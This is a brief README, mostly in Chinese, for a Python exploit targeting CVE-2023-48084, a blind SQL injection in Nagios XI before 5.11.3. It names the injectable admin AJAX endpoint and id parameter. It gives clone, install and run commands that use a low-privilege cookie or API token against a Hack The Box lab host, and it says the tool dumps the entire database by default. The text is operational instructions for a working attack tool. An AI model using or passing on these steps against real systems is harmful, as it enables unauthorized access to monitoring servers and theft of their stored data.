针对 CVE-2023-48084 的 Python 漏洞利用程序 -> Nagios XI before version 5.11.3 was discovered to contain a SQL injection vulnerability via the bulk modification tool.
该漏洞利用程序通过 /admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=(<SQL COMMAND TO EXECUTE>) 执行 SQL 查询,并利用盲 SQL 注入...
克隆仓库并安装 requirements.txt
git clone https://github.com/Hamibubu/CVE-2023-48084.git
cd CVE-2023-48084
pip install -r requirements.txt
现在执行该程序,你需要一个非管理员会话 cookie 或 API 令牌,例如
python3 CVE-2023-48084.py --url https://monitored.htb/nagiosxi -a <token>
python3 CVE-2023-48084.py --url https://monitored.htb/nagiosxi -c <cookie>
默认情况下,它会尝试从 schemas 开始转储整个数据库;如果你想要更快,只需查看代码并提取你需要的部分。